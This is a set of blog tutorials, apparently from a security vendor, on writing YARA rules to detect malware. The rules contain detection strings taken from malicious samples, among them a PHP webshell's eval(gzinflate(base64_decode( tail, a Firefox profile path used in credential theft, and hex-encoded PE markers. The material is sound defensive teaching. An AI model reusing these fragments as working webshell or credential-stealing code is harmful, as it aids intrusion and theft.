Spotlight: Threat Hunting YARA Rule Example

With this post, we would like to demonstration the YARA rule creation process for the so-called “threat hunting” rule category that we use in VALHALLA.

We noticed that many interested parties thought that “threat hunting” YARA rules are just rules with lower scores indicating a lower certainty. But in fact, they’re our most successful rules. The reason behind this is that they focus on anomalies as they appear in obfuscated samples and we’re not just talking about different forms of encoding.

Looking at the current table named “Successful YARA Rules in Set” on the VALHALLA start page, you’ll see many rule names that start with “SUSP_” for “suspicious”. 

These rules don’t match on a specific threat / malware but detect

  • certain methods (evasion, exploitation, side-loading, LOLBASs, LOLBINs)
  • casing anomalies (like cMd.ExE)
  • many forms of suspicious encodings
  • reversed strings
  • suspicious parameter combinations (e.g. certutil -decode)
  • suspicious packer / PE information combinations (like AutoIt executables from Microsoft)
  • and much more

So, these rules cannot be used for classification but they’re certainly priceless to detect new unknown threats.

Genesis of a New Threat Hunting YARA Rule

Processing different samples from various threat groups we often notice patterns in malicious code that looks as if it could be used for a generic “threat hunting” rule. 

The MuddyWater sample (8f0c6a09d1fca3d0002d3047733b50fe5153a33436d576c5020f0a21761242f1) contains the following base64 encoded block. 

While looking at this code block you can see repeating patterns even before decoding it just by scrolling over it. 

A good analysts asks himself “could this pattern serve as a signature?”.

To answer the question he decodes the base64 encoded chunk and gets a script with the following content:

He’ll notice a block of hex encoded values in a list. It seems that the obfuscation of the lower level (hex) can be detected in the upper layer (base64). So, by using a combination of these two forms of obfuscation, the attackers provide us a pretty specific pattern to detect a malicious – or rather – a highly suspicious code.

Next we try to figure out the exact usable patterns and put them to the test with different offsets. We use simple regular expressions in CyberChef to highlight matches. 

For our YARA rules, we don’t want to use regular expressions but byte patterns with place holders. Even for this task we can make use of CyberChef. 

The output can be used in a YARA rule that looks like this:

rule SUSP_Base64_Encoded_Hex_Encoded_Code {
   meta:
      author = "Florian Roth"
      description = "Detects hex encoded code that has been base64 encoded"
      date = "2019-04-29"
      score = 65
      reference = "Internal Research"
   strings:
      $x1 = { 78 34 4e ?? ?? 63 65 44 ?? ?? 58 48 67 }
      $x2 = { 63 45 44 ?? ?? 58 48 67 ?? ?? ?? 78 34 4e }
   condition:
      1 of them
}

To us it is not surprising that a test with the rule returned a lot of samples with low or no AV detection at all. We tested the hash list of the samples retrieved from a Virustotal Retrohunt with Munin and got the following results: 

As you can see, it’s not possible to verify the results based on the AV detection ratio. However, it’s a good sign that other threat hunting rules or even rules for known webshells from our ruleset match on these samples as well. We typically evaluate the false positive rate of this type of rules with the help of the file names (e.g. c99.php, virus.txt, *_codexgigas, Virusshare_*) and some spot checks.

You’ll also note that the rule matches many different content types – emails (.eml), executables, web shells, scripts. That’s one of the reasons why we love these rules so much.

The second screenshot contains some reassuring matches of the customized older version of the LaZagne credential dumper used by MuddyWater and apparently also encoded in the described form. (b8e97c96aa18916c15eea5c78d5a20b966aa45f332a5ea4d9ac2c87ebe5adff6)

You can find a full munin result file of the retrohunt matches here.

The YARA rule will be pushed to the signature-base that we provide for the community and will also be available in a streamlined form in the VALHALLA demo feed very soon. 

I hope you liked it.

For more information like this, please subscribe to the newsletter or follow us on twitter: @thor_scanner 

50 Shades of YARA

A long time ago I’ve noticed that there is no single best YARA rule for a given sample, but different best solutions depending on the user’s requirements and use case. I noticed that I often create 2 to 3 YARA rules for a single sample that I process, while each of them serves a different purpose.

In this blog post, I’d like to describe the three most common rule types.

In the following example I’ll use the malware sample with hash 7415ac9d4dac5cb5051bc0e0abff69fbca4967c7 (VirusBay, Hybrid-Analysis)

While looking at the strings extracted by yarGen, you’ll notice that it contains a lot of interesting strings. In my past tutorials (1, 2, 3) I’ve always distinguished between “Highly Specific” and “Suspicious” strings (see Part 3 of the blog post series). Today I’d like to show you a more purpose oriented approach. 

The following screenshots shows what types of strings I see while looking at these strings:

The strings that are marked with yellow look very specific. I’d use them as “Highly Specific” strings ($x*) of which only a single one is required to trigger the rule: 1 of ($x*)

The strings marked green will be used in combination with other green strings. A reasonable set of these strings is required to trigger the rule: $u1 and 1 of ($f*)

The strings marked with red color could serve in a rule that tracks the C2 addresses used by this sample and the strings marked blue could be used for a generic detection of malicious samples that can be completely unrelated.

The different rule categories are:

  • Regular Rules: Detect a certain malware or malware family 
  • Threat Intel Tracking Rules: Detect specific indicators that relate to a certain actor
  • Method Detection Rules: Detect methods or anomalies 

The following table describes these three different types of rules and gives some string examples. 

Regular Rules

In the case of the “Regular Rules” I distinguish between two different flavors: 

  • Threat Detection Rules
  • Threat Hunting Rules

The difference between these flavors is based on a different level of strictness in the conditions and not on the different selection of strings. While a “threat detection” rule may require “6 of them”, a “threat hunting” rule may be satisfied with “3 of them”, accepting some false positives. 

The reason why someone distinguishes between “threat detection” and “threat hunting” rules is that the response to matches can be very different. Antivirus solutions that respond to matches with “delete” or “disinfect” reactions do not accept false positives and avoid false positives by any means.

In “threat hunting” use cases which include direct destructive reactions to signatures matches are rare. Typically analysts investigate such an event, classify and react to it manually. In “threat hunting” scenarios analysts try to avoid “false negatives” by all means. 

(Source: Chris Gerritz @gerritzc

Threat Intel Tracking

In threat intel, we can use YARA rules to track the activity of certain actors in cases in which there are certain characteristics or keywords that persist over longer periods and campaigns. 

A very convenient form of tracking without having access to the telemetry data of OS and AV vendors is offered in the form of YARA match notification services as provided by VirusTotal or ReversingLabs

Method Detection Rules

During the past year I focussed on the last rule type “Method Detection” whenever I had the opportunity as it allows me to provide very generic rules that produce amazing results with a minimum of false positives.

However, those rule matches lack a reference like a malware name or an adversary group that used the detected method in their samples. Here is an example with one of the few public YARA rules published in the “signature-base” repository:

Sample: fc18bc1c2891b18bfe644e93c60a2822ad367a697bebc8c527bc9f14dad61db5 

The comment tab shows a match with generic rule “SUSP_LNK_SuspiciousCommands” . No reference is given. The Antivirus detection ratio is low. 

You can find more matches with this rule on Virustotal using the search function – URL: https://www.virustotal.com/#/search/lnk 

Conclusion

These are the reasons why the analysis of a single sample often results in 2-3 different YARA rules.

Using this method the coverage is exceptionally good as the set of rules covers specific samples of the same family and the different malware families the use the same methods.

YARA Rule Sets and Rule Feed

As previously announced our YARA rule packs and feeds will be available in March/April 2019. We’ve put a lot of effort into a internal system named “Mjolnir” that parses, normalizes, filters, tags and automatically modifies our rule base, which contains more than 9000 YARA rules. 

This system will now fill a database of tagged YARA rules – the basis of our new YARA services. 

The services will be divided into two categories:

  • YARA Rule Set
  • YARA Rule Feed

YARA Rule Set

The YARA rule set consist of more than 7000 YARA rules of different categories that are used in our scanners.

Some of our rules use extensions (external variables) that are only usable in our scanner products. These rules, experimental, third party and other classified rules will not be part of the purchasable rule set. 

YARA Rule Feed 

The YARA rule feed is a subscription on our rules. The feed always contains the rules of the last 90 days, which is between 250-400 YARA rules. 

Rule Samples

The quality of the rules in the rule set are comparable to the rules in our public “signature-base” repository. 

Some good examples for the different rule categories are:

Quality and Focus

The rules are tested against a data set of more than 350 TB of goodware. The goodware file repository consists of Windows OS files, several full Linux distributions and a big collection of commercial and free software. 

However, false positives are always possible. We do not recommend any destructive action on a signature match, like delete or blocking.

The main focus of our rules are:

  • Threat Hunting
  • Classification
  • Anomaly Detection
  • Compromise Assessment 

Subscribe to our Early Access Mailing List

Short Tutorial: How to Create a YARA Rule for a Compromised Certificate

Working in incident response or malware analysis, you may have come across compromised and sometimes revoked certificates used to sign malware of different types. Often threat groups use stolen certificates to sign their malware.

I’d like to show you an easy way to create a YARA rule for such a certificate. We will look at a sample that has been marked as malware by many Antivirus engines on Virustotal and the “Details” tab shows a revoked certificate. That’s a good indicator for a compromised certificate that has been and sometimes is still used by threat groups to sign their binaries.

Sample: ee5340b2391fa7f8d6e22b32dcd48f8bfc1951c35491a1e2b4bb4ab2fcbd5cd4

Let’s look at the details. I recommend creating a YARA that uses the “pe” module of YARA and integrate the Serial Number and the Issuer of the certificate to create an unambiguous rule.

rule MAL_Compromised_Cert_Nov18_1 {
   meta:
      description = "Detects a compromised certificate of CORP 8 LIMITED - identified in November 2018"
      date = "2018-11-01"
      hash = "ee5340b2391fa7f8d6e22b32dcd48f8bfc1951c35491a1e2b4bb4ab2fcbd5cd4"
   condition:
      uint16(0) == 0x5a4d and
      for any i in (0 .. pe.number_of_signatures) : (
         pe.signatures[i].issuer contains "COMODO RSA Code Signing CA" and
         pe.signatures[i].serial == "4c:75:75:69:2c:2d:06:51:03:1a:77:ab:49:22:4c:cc"
      )
}

As you can see, you need to copy two strings from Virustotals web page:

Copy the CA name and use it for the “.issue” condition as well as the serial number, which you use for the “.serial” condition. Make sure that you changed the casing to lower-case as YARA does not expect and understand uppercase characters in the serial field.

Virustotal Intelligence users can use the following hunting rule to detect new uploaded malicious samples with revoked certificates:

rule Compromised_Certificate {
  condition:
    // New files, detected by more than 30 engines and revoked certificate
   new_file and positives > 30 and tags contains "revoked-cert"
}

YARA Rule Creation Crackme

I’ve collected some interesting samples for an internal YARA rule creation training session with our interns. With this blog post, I’ll also share 3 new premium feed YARA rules by pushing them to the Open Source signature-base repo.

What are the the preliminary conditions for the rule creation?

  • We don’t want to to spend more than 20 minutes for a single rule.
  • We use string extraction, hex editors and yarGen
  • We also use public resources like Google (yes), malware.one

Requirements:

  • You need a Virusbay account to download the samples

So, get ready. We process the following 3 cases.

Turla Agent-BTZ

  • Great for yarGen string extraction
  • Especially check for variations of strings (in PE header) that are highly specific
  • Use google to check strings

Sample

PLEAD Downloader

  • yarGen will not produce good results in this case
  • Try to compare the samples in order to find specific strings that appear in all of them

Sample 1

Sample 2

Sample 3

Sample 4

TYPEFRAME (Hidden Cobra)

  • Authors missed some specific strings

Sample

Solution

Don’t check the solution before you’ve created your own rules.

Agent.BTZ YARA rule

PLEAD YARA rule

TYPEFRAME YARA rule

Remember, there is no single correct solution to this task. Your rules may be better than mine. If that’s the case, please share them with me ?.

Write YARA Rules to Detect Embedded EXE Files in OLE Objects

This is the first blog post published on our new website. If you followed my blog on www.bsk-consulting.de you should consider subscribing to the RSS feed of this blog or the “Nextron Systems Newsletter”.

This is one of the YARA related blog posts showcasing a special use case. Last year I noticed that I wrote many rules for hex encoded strings found in OLE objects embedded in MS Office documents and RTF files.

I did most of the encoding and decoding work on the command line or with the help of CyberChef, an online tool provided by GCHQ. I also thought about a new YARA keyword that would allow us to write rules without encoding the strings.

Today, rules contain strings in a hex encoded form. I usually add the decoded string as a comment.

$s1 = "68007400740070003a002f002f00" /* http:// */

Rules with the new keyword would look like this:

$s1 = "http://" wide hex

Neat, isn’t it? I already forwarded that feature request to Wesley Shields (@wxs) but it seems to be no low hanging fruit. I’ll keep you informed about this feature via Twitter.

A tweet by Kevin Beaumont reminded me of the work that I’ve done and while looking at the tool by Rich Warren. I thought that I should create a illustrative example of a more generic YARA rule that explains why the “hex” keyword would be very useful.

The tool creates weaponized RTF files with hex encoded payloads.

I derived some strings for a new rule from the decoded object.

/* Hex encoded strings */
/* This program cannot be run in DOS mode */
$a1 = "546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465" ascii
/* C:fakepath */
$a2 = "433a5c66616b65706174685c" ascii

To further improve the rule I went to my goodware directory and ran the following command to generate a list of the most frequent PE file headers in a hex encoded form.

neo$ find ./ -type f -name "*.exe" -exec xxd -ps -l 14 {} ; | sort | uniq -c | sort -k 1 | tail -10
4 4d5a87000300000020000000ffff
4 4d5aae010300000020000000ffff
4 4d5abf000300000020000000ffff
4 4d5add000300000020000000ffff
4 4d5aeb000300000020000000ffff
6 213c73796d6c696e6b3e2f757372
8 4d5a72010200000020001700ffff
88 4d5a40000100000006000000ffff
116 4d5a50000200000004000f00ffff
5852 4d5a90000300000004000000ffff

Then I used these hex encoded strings in a YARA rule that looks for these strings in the OLE objects of an RTF file.

rule MAL_RTF_Embedded_OLE_PE {
   meta:
      description = "Detects a suspicious string often used in PE files in a hex encoded object stream"
      author = "Florian Roth"
      reference = "https://github.com/rxwx/CVE-2018-0802/blob/master/packager_exec_CVE-2018-0802.py"
      date = "2018-01-22"
   strings:
      /* Hex encoded strings */
      /* This program cannot be run in DOS mode */
      $a1 = "546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465" ascii
      /* KERNEL32.dll */
      $a2 = "4b45524e454c33322e646c6c" ascii
      /* C:fakepath */
      $a3 = "433a5c66616b65706174685c" ascii
      /* DOS Magic Header */
      $m3 = "4d5a40000100000006000000ffff"
      $m2 = "4d5a50000200000004000f00ffff"
      $m1 = "4d5a90000300000004000000ffff"
   condition:
      uint32be(0) == 0x7B5C7274 /* RTF */
      and 1 of them
}

The first analysis of the coverage looks pretty good. I see only clear matches in munin‘s output.

The few questionable matches look fishy enough to release my rule.

If you have further ideas to improve the rule, ping me via Twitter.

How to Write Simple but Sound Yara Rules – Part 3

It has been a while since I wrote “How to Write Simple but Sound Yara Rules – Part 2“. Since then I changed my rule creation method to generate more versatile rules that can also be used for in-memory detection. Furthermore new features were added to yarGen and yarAnalyzer.

Binarly

The most important feature of the upcoming yarGen YARA Rule Generator release is the Binarly API integration.
Binarly is a “binary search engine” that can search arbitrary byte patterns through the contents of tens of millions of samples, instantly. It allows you to quickly get answers to questions like:

  • “What other files contain this code/string?”
  • “Can this code/string be found in clean applications or malware samples?”

Binary Search Engine - Binar.ly

Binary Search Engine – Binar.ly


This means that you can use Binarly to quickly verify the quality of your YARA strings.
Furthermore, Binarly has a YARA file search functionality, which you can use to scan their entire collection (currently at 7.5+ Million PE files, 3.5M clean – over 6TB) with your rule in a less than a minute.
For yarGen I integrated their API from https://github.com/binarlyhq/binarly-sdk.
In order to be able to use it you just need an API key that you can get for free if you contact them at contact@binar.ly. They are looking for researchers interested in testing the service. They limit the requests per day to 10,000 for free accounts – which is plenty. yarGen uses between 50 and 500 requests per sample during rule generation.
The following screenshot shows Binarly lookups in yarGen’s debugging mode. You can see that some of the strings produce a pretty high score. This score is added to the total score, which decides if a string gets included in the final YARA rule. The score generation process from the Binarly results is more complex than it might seem. For example, I had to score samples down that had 3000+ malware but also 1000 goodware matches. The goodware matches have higher weight than the malware matches. A string could have 15.000+ malware matches – if it also appears in 1000 goodware matches it does not serve as a good YARA rule string. I also handled cases in which small result sets lead to high Binarly scores.
Binarly Service Lookup in yarGen 0.16

Binarly Service Lookup in yarGen 0.16


Therefore the evaluation method that generates the score of each string has been further improved in the new version 0.16.0 of yarGen. Both the Binarly service and the new yarGen version are still ‘testing’. Do not upgrade your local yarGen installation to v0.16b in cases in which you rely on the rule generation process. Follow me and Daniel Radu (Binarly) on twitter to stay up-to-date.

Improved Rule Generation

But let’s talk about the improved rule generation process.
As described in my previous articles, I try to divide the list of strings generated by yarGen into two different groups:

  • Highly Specific Strings
    These strings include C2 server addresses, mutextes, PDB file names, tool/malware names (nbtscan.exe, iexp1orer.exe), tool outputs (e.g. keylog text output format), typos in common strings (e.g. “Micosoft Corporation”)
  • Suspicious Strings
    These strings look suspicious and uncommon but may appear in some exotic goodware, dictionary libraries or unknown software (e.g. ‘/logos.gif’, ‘&PassWord=’, ‘User-Agent: Mozilla’ > I’ve seen pigs fly – legitimate software contains the rarest strings)

In previous examples I always tended to combine these strings with magic header and file size. yarGen 0.15 and older versions generated those rules by default. The problem with these rules is that they do not detect the malware or tools to process memory.
Therefore I changed my rule generation process and adjusted yarGen to follow that example. As I said before, yarGen is not designed to generate perfect rules. Its main purpose is to generate raw rules that require the least effort to complete and could also work without further modification.
The following image shows how new rules are composed. They contain two main conditions, one for the file detection and one for the in-memory detection. I tried to copy the manual rule generation process as far as possible.

YARA Rule Creation

YARA rule composition (manual composition and yarGen v0.16)


The statement to detect files on disk combines the magic header, file size and only one of the highly specific strings OR a set of the suspicious strings.
For the in-memory detection I omit the magic header and file size. Highly specific strings and suspicious strings are combined with a logical AND.
The different statements (manual rule creation) look like this:

/* Detects File on Disk */
( uint16(0) == 0x5a4d and filesize < 100KB and ( 1 of ($x*) or 4 of ($s*) ) )
or
/* Detects Malware/Tool in Memory */
( 1 of ($x*) and 4 of ($s*) )

Here is an example of a rule produced by yarGen v0.16 (sample Unit 78020 – WininetMM.exe). I shows a ‘raw’ rule without further editing and the ‘scores’ included as comments:

rule WininetMM {
    meta:
        description = "Auto-generated rule - file WininetMM.exe"
        author = "YarGen Rule Generator"
        reference = "not set"
        date = "2016-04-15"
        hash1 = "bfec01b50d32f31b33dccef83e93c43532a884ec148f4229d40cbd9fdc88b1ab"
    strings:
        $x1 = ".?AVCWinnetSocket@@" fullword ascii /* PEStudio Blacklist: strings */ /* score: '40.00' (binarly: 30.0) */
        $x2 = "DATA_BEGIN:" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.89' (binarly: 27.89) */
        $x3 = "dMozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide /* PEStudio Blacklist: strings */ /* score: '32.53' (binarly: 5.53) */
        $s4 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide /* PEStudio Blacklist: strings */ /* score: '20.00' (binarly: -7.0) */
        $s5 = "Accept-Encoding:gzip,deflate/r/n" fullword wide /* PEStudio Blacklist: strings */ /* score: '10.35' (binarly: -1.65) */
        $s6 = "/%d%s%d" fullword ascii /* score: '10.27' (binarly: 0.27) */
        $s7 = "%USERPROFILE%\\Application Data\\Mozilla\\Firefox\\Profiles" fullword wide /* PEStudio Blacklist: strings */ /* score: '9.36' (binarly: -13.64) */
        $s8 = "Content-Type:application/x-www-form-urlencoded/r/n" fullword wide /* PEStudio Blacklist: strings */ /* score: '5.61' (binarly: -9.39) */
        $s9 = ".?AVCMyTlntTrans@@" fullword ascii /* score: '5.00' */
    condition:
        ( uint16(0) == 0x5a4d and filesize < 300KB and ( 1 of ($x*) and all of ($s*) ) ) or ( all of them )
}

You may ask “Why do the ‘DATA_BEGINS:’ and ‘.?AVCWinnetSocket@@’ do have such high scores”? Well, that’s the reason why analysts needs the support of big data:
Screen Shot 2016-04-15 at 12.51.40
Screen Shot 2016-04-15 at 12.52.01
I have to add that Binarly offers two query modes (fast/exact) of which yarGen uses the ‘fast’ mode. An analyst that doubts the produced results would use ‘exact’ query mode to verify the results manually. Please ask Daniel about the details.

yarAnalyzer – Inventory Generation

The new version of yarAnalyzer allows to generate an inventory of your YARA rule sets. This features comes in very handy in cases in which you have to handle a big set of rules. The ‘–inventory’ option generates a CSV file that can be prettied up in MS Excel or Openoffice Calc.

YARA Rule Analyzer

yarAnalyzer Inventory

YARA Rules to Detect Uncommon System File Sizes

YARA is an awesome tool especially for incident responders and forensic investigators. In my scanners I use YARA for anomaly detection on files. I already created some articles on “Detecting System File Anomalies with YARA” which focus on the expected contents of system files but today I would like to focus on the size of certain system files.
I did a statistical analysis in order to rate a suspicious “csrss.exe” file and noticed that the size of the malicious file was way beyond the typical file size. I thought that I should do this for other typically abused file names based on this blog post by @hexacorn.
I used my VT Intelligence access and burned some searches to create this list.
System Files and Sizes

System Files and Sizes


You can find a spread sheet of this list here. It can be edited by everyone.
I created some YARA rules that use the external variable “filename” to work. LOKI and THOR use the “filename” and other external variables by default.
UPDATE 23.12.15 4:50pm:
I’ll update the list on the LOKI github page. For a current version of the YARA signatures visit this page.

rule Suspicious_Size_explorer_exe {
    meta:
        description = "Detects uncommon file size of explorer.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "explorer.exe"
        and ( filesize < 1000KB or filesize > 3000KB )
}
rule Suspicious_Size_chrome_exe {
    meta:
        description = "Detects uncommon file size of chrome.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "chrome.exe"
        and ( filesize < 500KB or filesize > 1300KB )
}
rule Suspicious_Size_csrss_exe {
    meta:
        description = "Detects uncommon file size of csrss.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "csrss.exe"
        and ( filesize > 18KB )
}
rule Suspicious_Size_iexplore_exe {
    meta:
        description = "Detects uncommon file size of iexplore.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "iexplore.exe"
        and ( filesize < 75KB or filesize > 910KB )
}
rule Suspicious_Size_firefox_exe {
    meta:
        description = "Detects uncommon file size of firefox.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "firefox.exe"
        and ( filesize < 265KB or filesize > 910KB )
}
rule Suspicious_Size_java_exe {
    meta:
        description = "Detects uncommon file size of java.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "java.exe"
        and ( filesize < 140KB or filesize > 900KB )
}
rule Suspicious_Size_lsass_exe {
    meta:
        description = "Detects uncommon file size of lsass.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "lsass.exe"
        and ( filesize < 13KB or filesize > 45KB )
}
rule Suspicious_Size_svchost_exe {
    meta:
        description = "Detects uncommon file size of svchost.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "svchost.exe"
        and ( filesize < 14KB or filesize > 40KB )
}
rule Suspicious_Size_winlogon_exe {
    meta:
        description = "Detects uncommon file size of winlogon.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "winlogon.exe"
        and ( filesize < 279KB or filesize > 510KB )
}
rule Suspicious_Size_igfxhk_exe {
    meta:
        description = "Detects uncommon file size of igfxhk.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "igfxhk.exe"
        and ( filesize < 200KB or filesize > 265KB )
}
rule Suspicious_Size_servicehost_dll {
    meta:
        description = "Detects uncommon file size of servicehost.dll"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "servicehost.dll"
        and filesize > 150KB
}
rule Suspicious_Size_rundll32_exe {
    meta:
        description = "Detects uncommon file size of rundll32.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "rundll32.exe"
        and ( filesize < 30KB or filesize > 60KB )
}
rule Suspicious_Size_taskhost_exe {
    meta:
        description = "Detects uncommon file size of taskhost.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "taskhost.exe"
        and ( filesize < 45KB or filesize > 85KB )
}
rule Suspicious_Size_spoolsv_exe {
    meta:
        description = "Detects uncommon file size of spoolsv.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "spoolsv.exe"
        and ( filesize < 50KB or filesize > 800KB )
}
rule Suspicious_Size_smss_exe {
    meta:
        description = "Detects uncommon file size of smss.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "smss.exe"
        and ( filesize < 40KB or filesize > 140KB )
}
rule Suspicious_Size_wininit_exe {
    meta:
        description = "Detects uncommon file size of wininit.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "wininit.exe"
        and ( filesize < 90KB or filesize > 250KB )
}

I ran this rule set over my goodware database and got only a few false positives. Feel free to use these rules wherever you like but please share new rules or statistical analyses on other system files.

Yara System File Checks - False Positives

False Positives

How to Write Simple but Sound Yara Rules – Part 2

How to Write Simple but Sound Yara Rules – Part 2

Months ago I wrote a blog article on “How to write simple but sound Yara rules“. Since then the mentioned techniques and tools have improved. I’d like to give you a brief update on certain Yara features that I frequently use and tools that I use to generate and test my rules.

Handle Very Specific Strings Differently

In the past I was glad to see very specific strings in samples and sometimes used these strings as the only indicator for detection. E.g. whenever I’ve found a certain typo in the PE header fields like “Micorsoft Corportation” I cheered and thought that this would make a great signature. But – and I have to admit that now – this only makes a nice signature. Great signatures require not only to match on a certain sample in the most condensed way but aims to match on similar samples created by the same author or group.
Look at the following rule:

rule Enfal_Malware_Backdoor {
    meta:
        description = "Generic Rule to detect the Enfal Malware"
        author = "Florian Roth"
        date = "2015/02/10"
        super_rule = 1
        hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
        hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
        hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
        score = 60
    strings:
        $x1 = "Micorsoft Corportation" fullword wide
        $x2 = "IM Monnitor Service" fullword wide
        $a1 = "imemonsvc.dll" fullword wide
        $a2 = "iphlpsvc.tmp" fullword
        $a3 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
        $s1 = "urlmon" fullword
        $s2 = "Registered trademarks and service marks are the property of their" wide
        $s3 = "XpsUnregisterServer" fullword
        $s4 = "XpsRegisterServer" fullword
    condition:
        uint16(0) == 0x5A4D and
        (
            ( 1 of ($x*) ) or
            ( 2 of ($a*) and all of ($s*) )
        )
}

What I do when I review the 20 strings that are generated by yarGen is that I try to categorize the extracted strings in 3 different groups:

  • Very specific strings (one of them is sufficient for successful detection, e.g. IP addresses, payload URLs, PDB paths, user profile directories)
  • Specific strings (strings that look good but may appear in goodware as well, e.g. “wwwlib.dll”)
  • Other strings (even strings that appear in goodware; without random code from compressed or encrypted data; e.g. “ModuleStart”)

Then I create a condition that defines:

  • A Certain Magic Header (remove it in case of ASCII text like scripts or webshells)
  • 1 of the very specific strings OR
  • some of the specific strings combined with many (but not all) of the common strings

Here is another example that does only have very specific strings (x) and common strings (s):

rule Cobra_Trojan_Stage1 {
    meta:
        description = "Cobra Trojan - Stage 1"
        author = "Florian Roth"
        reference = "https://blog.gdatasoftware.com/blog/article/analysis-of-project-cobra.html"
        date = "2015/02/18"
        hash = "a28164de29e51f154be12d163ce5818fceb69233"
    strings:
        $x1 = "KmSvc.DLL" fullword wide
        $x2 = "SVCHostServiceDll_W2K3.dll" fullword ascii
        $s1 = "Microsoft Corporation. All rights reserved." fullword wide
        $s2 = "srservice" fullword wide
        $s3 = "Key Management Service" fullword wide
        $s4 = "msimghlp.dll" fullword wide
        $s5 = "_ServiceCtrlHandler@16" fullword ascii
        $s6 = "ModuleStart" fullword ascii
        $s7 = "ModuleStop" fullword ascii
        $s8 = "5.2.3790.3959 (srv03.sp2.070216-1710)" fullword wide
    condition:
        uint16(0) == 0x5A4D and filesize < 50000 and 1 of ($x*) and 6 of ($s*)
}

If you can’t create a rule that is sufficiently specific, I recommend the following methods to restrict the rule:

  • Magic Header (use it as first element in condition – see performance guidelines, e.g. “uint16(0) == 0x5A4D”)
  • File Size (malware that mimics valid system files, drivers or legitimate software often differs significantly in size; try to find the valid files online and set a size value in your rule, e.g. “filesize > 200KB and filesize < 600KB")
  • String Location (see the “Location is Everything” section)
  • Exclude strings that occur in false positives (e.g. $fp1 = “McAfeeSig”)

Location is Everything

One of the most underestimated features of Yara is the possibility to define a range in which strings occur in order to match. I used this technique to create a rule that detect metasploit meterpreter payloads quite reliably even if it’s encoded/cloaked. How that?
If you see malware code that is hidden in an overlay at the end of a valid executable (e.g. “ab.exe”) and you see only strings that are typical function exports or mimics a well-known executable ask the following questions:

  • Is it normal that these strings are located at this location in the file?
  • Is it normal that these strings occur more than once in that file?
  • Is the distance between two strings somehow specific?

Malware Strings

Malware Strings


In case of the unspecific malware code in the PE overlay, try to define a rule that looks for a certain file size (e.g. filesize > 800KB) and the malware strings relative to the end of the file (e.g. $s1 in (filesize-500..filesize)).
The following example shows a unspecified webshell that contains strings that may be modified by an attacker in future versions when applied in a victim’s network. Try always to extract strings that are less likely to be changed.
Webshell Code PHP

Webshell Code PHP


The variable name “$code” is more likely to change than the function combination “@eval(gzinflate(base64_decode(” at the end of the file. It is possible that valid php code contains “eval(gzinflate(base64_decode(” somewhere in the code but it is less likely that it occurs in the last 50 bytes of the file.
I therefore wrote the following rule:

rule Webshell_b374k_related_1 {
    meta:
        description = "Detects b374k related webshell"
        author = "Florian Roth"
        reference = "https://goo.gl/ZuzV2S"
        score = 65
        hash = "d5696b32d32177cf70eaaa5a28d1c5823526d87e20d3c62b747517c6d41656f7"
        date = "2015-10-17"
    strings:
        $m1 = "<?php"
        $s1 = "@eval(gzinflate(base64_decode(" ascii
    condition:
        $m1 at 0 and $s1 in (filesize-50..filesize) and filesize < 20KB
}

Performance Guidelines

I collected many ideas by Wesley Shields and Victor M. Alvarez and composed a gist called “Yara
Performance Guidelines”. This guide shows you how to write Yara rules that use less CPU cycles by avoiding CPU intensive checks or using new condition checking shortcuts introduced in Yara version 3.4.
Yara Performance Guidelines

PE Module

People sometimes ask why I don’t use the PE module. The reason is simple: I avoid using modules that are rather new and would like to see it thoroughly tested prior using it in my scanners running in productive environments. It is a great module and a lot of effort went into it. I would always recommend using the PE module in lab environments or sandboxes. In scanners that walk huge directory trees a minor memory leak in one of the modules could lead to severe memory shortages. I’ll give it another year to prove its stability and then start using it in my rules.

yarGen

yarGen has an opcode feature since the last minor version. It is active by default but only useful in cases in which not enough strings could be extracted.
I currently use the following parameters to create my rules:

python yarGen.py --noop -z 0 -a "Florian Roth" -r "http://link-to-sample" /mal/malware

The problem with the opcode feature is that it requires about 2,5 GB more main memory during rule creation. I’ll change it to an optional parameter in the next version.

yarAnalyzer

yarAnalyzer is a rather new tool that focuses on rule coverage. After creating a bigger rule set or a generic rule that should match on several samples you’d like to check the coverage of your rules in order to detect overlapping rules (which is often OK).
yarAnalyzer helps you to get an overview on:

  • rules that match on more than one sample
  • samples that show hits from more than one rule
  • rules without hits
